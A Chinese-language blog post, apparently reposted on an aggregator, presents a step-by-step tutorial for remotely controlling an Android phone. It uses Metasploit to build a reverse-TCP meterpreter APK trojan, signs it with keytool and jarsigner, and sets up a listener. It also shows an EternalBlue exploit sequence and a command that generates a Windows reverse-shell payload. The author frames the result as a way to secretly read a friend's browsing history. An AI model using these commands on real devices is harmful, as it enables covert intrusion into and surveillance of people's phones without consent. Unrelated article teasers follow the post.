红队老子养成记2 - 不想渗透pc?我们来远控安卓!(全网最详细)

大家好,我是Dest1ny。

今天我们是红队专题中的远控安卓。

这个实验会非常有趣,大家多多点赞!


环境:

一台有公网ip的vps / kali / 带msf工具即可

一台安卓手机(最好老一点,因为我们这里不涉及免杀)

CLASS-1 msfconsole 和 msfvenom

msfconsole

  • 功能: msfconsole 是 Metasploit 框架的主要命令行界面,是一个功能全面且强大的控制台。它用于执行各种攻击操作,包括漏洞扫描、漏洞利用、后期渗透等。
  • 特点:
    • 允许用户浏览、选择和执行可用的漏洞利用模块(Exploit Modules)。
    • 可以设置Payload(恶意代码)、编码器(Encoders)、监听器(Listeners)等参数。
    • 支持通过插件和脚本扩展功能,如 post-exploitation 模块、漏洞扫描插件等。
    • 支持与其他工具集成,方便进行信息收集、漏洞扫描、提权和持久化等任务。
  • 使用场景:
    • 当你想要选择和执行漏洞利用时,可以通过 msfconsole 加载模块、配置参数,并执行攻击。
    • 适合实时操作和渗透测试人员互动操作。
msfconsole

进入控制台后,可以使用例如以下命令:

use exploit/windows/smb/ms17_010_eternalblue 
set RHOSTS 192.168.1.100 
set PAYLOAD windows/x64/meterpreter/reverse_tcp 
run 

msfvenom

  • 功能: msfvenom 是 Metasploit 用于生成攻击Payload的工具,它将之前的 msfpayloadmsfencode 工具合并为一个单独的工具。主要用于生成可用于漏洞利用的有效载荷(Payload)。
  • 特点:
    • 允许用户自定义Payload,并指定生成的格式(如 exe, elf, apk, raw 等)。
    • 支持对Payload进行编码和混淆,以绕过杀毒软件或检测机制。
    • 生成后的Payload可以与其他工具(如 msfconsole)一起使用,或直接用于恶意软件开发。
  • 使用场景:
    • 当你需要生成特定的Payload(如反向shell、绑定shell、下载执行器等)时,可以使用 msfvenom 自定义Payload参数并生成对应的文件。
    • 适合用来制作免杀Payload、混淆恶意软件,或在渗透测试中注入漏洞利用代码。
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe
  • 这条命令将生成一个反向TCP连接的Windows Meterpreter Payload,并保存为一个可执行文件 payload.exe

总结

  • msfconsole: 用于管理和执行漏洞利用的交互式控制台。
  • msfvenom: 用于生成和编码恶意Payload的工具。

CLASS-2 制作安卓木马

我们先使用msfvenom去制作木马!

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.209 LPORT=4444 R > Dest1ny.apk

这里的lhost使用本地的ip,lport是你想去监听的端口

CLASS-3 apk签名

为什么要apk签名?

APK需要签名的原因主要有以下几点:

  1. 验证完整性:签名确保APK未被篡改。如果APK文件被修改,签名验证将失败,系统会阻止安装。

  2. 开发者身份:签名帮助识别应用程序的开发者,确保应用来自可信来源,防止恶意软件冒充合法应用。

  3. 权限管理:通过签名,应用可以安全地共享权限和数据。如果两个应用具有相同签名,可以相互访问数据。

  4. 安全分发:在官方应用商店发布的APK必须签名,以减少恶意软件传播的风险。

  5. 防伪造:签名防止攻击者伪造应用,确保只有合法的APK能被安装和运行。

现在我们有一个apk文件,但是不是所有的apk文件都可以传到手机上就可以下载,我们要加入签名才可以。

第一步:使用keytool生成一个key文件。会让你输入该key的名称、单位、地址等等信息,最终生成一个key文件

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

这时候你会有一个my-release-key.Keystore的文件

第二步:使用该key文件配合JARsigner为APK签名

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore Dest1ny.apk alias_name

第三步:然后使用JARsigner验证签名

jarsigner -verify -verbose -certs Dest1ny.apk

 

CLASS-4  开始远控

使用msfconsole开启Metasploit

进行监听,要提前设置payload

use 7即可mei

没有公网ip,需要攻击机和被害机都在同一局域网下

然后就是设置lhost和lport

还要设置一下payload

android/meterpreter/reverse_tcp

 

使用你的被害者手机去下载apk文件,因为没有免杀,你要去手动下载!

这时候你就可以去偷偷看朋友的浏览记录了hhhh!

这里就不演示了!


今天肯定不水了!

后面我也会持续去更新内容!

大家多多点赞!!

想到300粉丝了!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/442322.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

typora笔记导出word格式:

Pandoc:各系统下载github链接 https://github.com/jgm/pandoc/releases/latest windows安装包 链接:https://pan.baidu.com/s/17AZNIMImbzFtWJAcAfAB0g?pwd55l2 提取码:55l2 先解压压缩包 点击 设置Pandoc路径,然后选择pa…

如何搭建自己的域名邮箱服务器?Poste.io邮箱服务器搭建教程,Linux+Docker搭建邮件服务器的教程

Linux系统Docker搭建Poste.io电子邮件服务器,搭建属于自己的域名邮箱服务器,可以无限收发电子邮件(Email)! 视频教程:https://www.bilibili.com/video/BV11p1mYaEpM/ 前言 什么是域名邮箱? …

vscode中安装python的包

首先需要调出命令行。然后运行代码,找到你所需要的环境。 PS C:\Users\Administrator\AppData\Local\ESRI\conda\envs\arcgispro-env> conda env list # conda environments: #C:\ProgramData\Anaconda3 base * C:\Users\Administrator\.con…

[C++ 核心编程]笔记 2 栈区和堆区

栈区: 由编译器自动分配释放&#xff0c;存放函数的参数值,同部变量等 注意事项&#xff1a;不要返回局部变量的地址&#xff0c;栈区开辟的数据由编译器自动释放 #define _CRT_SECURE_NO_WARNINGS 1 #include<iostream> using namespace std;//栈区数据注意事项 不要…

让机器来洞察他的内心!

本文所涉及所有资源均在传知代码平台可获取。 目录 洞察你的内心&#xff1a;你真的这么认为吗&#xff1f; 一、研究背景 二、模型结构和代码 D. 不一致性学习网络 E. 多模态讽刺分类 三、数据集介绍 四、性能展示 五、实现过程 1. 下载预训练的 GloVe 词向量&#xff08;Comm…

Hydra 新手友好使用教程

1. Hydra 简介 Hydra是一款强大的网络登录暴力破解工具&#xff0c;支持多种协议。本教程将帮助新手快速上手&#xff0c;掌握常用指令和操作。 2. 基本语法 hydra [参数] 目标 3. 核心参数详解 3.1 用户名和密码设置 单个用户名: -l LOGIN 例&#xff1a;-l admin 用户名…

Redis:事务

Redis&#xff1a;事务 事务事务操作MULTI & EXECDISCARDWATCH 事务 在MySQL中&#xff0c;事务遵循CIRD特性&#xff1a; 原子性&#xff1a;事务是一个整体&#xff0c;要么没有发生&#xff0c;要么已经执行完毕一致性&#xff1a;事务执行前后&#xff0c;数据都要符…

基于Arduino的遥控自平衡小车

基于Arduino的遥控自平衡小车 一、项目简介二、所需材料三、理论支持四、外壳设计五、线路连接六、检查MPU6050连接七、烧录库八、PID控制设置九、设置传感器参数十、无线移动控制十一、超声波模块 一、项目简介 一个使用Arduino Nano、MPU-6050以及便宜的6伏直流齿轮电机的自…

活久见!2024年诺贝尔物理学奖颁给了AI大佬Hinton 和 Hopfield

家人们&#xff01;让我们暂停手中工作&#xff0c;庆祝AI届的科学家首次获得诺贝尔物理学奖&#xff01;&#xff01;&#xff01;&#xff01;&#xff01; 刚刚出炉的热乎消息&#xff1a;今年的诺贝尔物理学奖颁发给了约翰霍普菲尔德 (John Joseph Hopfield)与杰弗里辛顿&a…

充电桩用能计量有序充电服务的探索应用

关键词&#xff1a;云平台&#xff1b;自动检测&#xff1b;能源管理&#xff1b;有序充电 今年&#xff0c;电动汽车行业抓住了疫情影响洼地&#xff0c;迅速找到了发展突破口&#xff0c;从电动汽车发行政策到锂电池开发技术均出台了多层面利好消息&#xff0c;未来一段时间…

【JavaEE初阶】深入理解不同锁的意义,synchronized的加锁过程理解以及CAS的原子性实现(面试经典题);

前言 &#x1f31f;&#x1f31f;本期讲解关于锁的相关知识了解&#xff0c;这里涉及到高频面试题哦~~~ &#x1f308;上期博客在这里&#xff1a;【JavaEE初阶】深入理解线程池的概念以及Java标准库提供的方法参数分析-CSDN博客 &#x1f308;感兴趣的小伙伴看一看小编主页&am…

SpringBoot日常:redission的接入使用和源码解析

文章目录 一、简介二、集成redissionpom文件redission 配置文件application.yml文件启动类 三、JAVA 操作案例字符串操作哈希操作列表操作集合操作有序集合操作布隆过滤器操作分布式锁操作 四、源码解析 一、简介 Redisson 是一个在 Redis 的基础上实现的 Java 驻内存数据网格…

Windows Ubuntu下搭建深度学习Pytorch训练框架与转换环境TensorRT

Windows Ubuntu下搭建深度学习Pytorch训练框架与转换环境TensorRT JetBrains2024&#xff08;IntelliJ IDEA、PhpStorm、RubyMine、Rider……&#xff09;安装包Anaconda Miniconda安装.condarc 文件配置镜像源查看conda的配置和源(channel)自定义conda虚拟环境路径conda常用命…

破解反编译:使用 ClassFinal 保护你的SpringBoot代码

在当今数字化时代&#xff0c;保护源代码的安全性变得愈发重要。无论是企业的核心算法还是独特的业务逻辑&#xff0c;代码一旦暴露&#xff0c;便可能导致竞争优势的丧失和商业机密的泄露。因此&#xff0c;在使用 Java 和 Spring Boot 开发项目时&#xff0c;理解从源代码到可…

websocket连接异常报错1006

目录&#xff1a; 1、问题现象2、问题原因3、解决方案 1、问题现象 WebSocket状态码的作用&#xff1a; 在WebSocket协议中&#xff0c;状态码用于表示连接状态和错误信息。通过状态码&#xff0c;我们可以快速判断连接是否成功&#xff0c;以及出现错误时的原因。常见的WebSo…

教培机构如何向知识付费转型

在数字化时代&#xff0c;知识付费已成为一股不可忽视的潮流。面对这一趋势&#xff0c;教育培训机构必须积极应对&#xff0c;实现向知识付费的转型&#xff0c;以在新的市场环境中立足。 一、教培机构应明确自身的知识定位。 在知识付费领域&#xff0c;专业性和独特性是关键…

VUE前后端分离毕业设计题目项目有哪些,VUE程序开发常见毕业论文设计推荐

目录 0 为什么选择Vue.js 1 Vue.js 的主要特点 2 前后端分离毕业设计项目推荐 3 后端推荐 4 总结 0 为什么选择Vue.js 使用Vue.js开发计算机毕业设计是一个很好的选择&#xff0c;因为它不仅具有现代前端框架的所有优点&#xff0c;还能让你专注于构建高性能、高可用性的W…

Matlab实现白鲸优化算法优化回声状态网络模型 (BWO-ESN)(附源码)

目录 1.内容介绍 2部分代码 3.实验结果 4.内容获取 1内容介绍 2部分代码 %% 清空环境变量 warning off % 关闭报警信息 close all % 关闭开启的图窗 clear % 清空变量 clc % 清空命令行 tic load bwand %%…

CC2530定时器1中断实现定时1-3

源码 #include "iocc2530.h"//引用CC2530头文件int t1_Count0; //定时器1溢出次数计数void Init_Led(void){ /*******************LED1初始化部分******************/P1SEL &~ 0x01; //设置P1_0口为通用I/O口P1DIR | 0x01; //设置P1_0口为输出口P…

软考越来越难了,2024年软考究竟还值不值得考?

最近不少同学沟通&#xff0c;聊到软考现在越来越难了&#xff0c;考了两三次都没过&#xff0c;也有不少新同学咨询软考考试的一些福利政策&#xff0c;投入大量的物力&#xff0c;财力&#xff0c;精力&#xff0c;那么到底软考值不值得考呢&#xff1f; 01 / 关于软考 软考…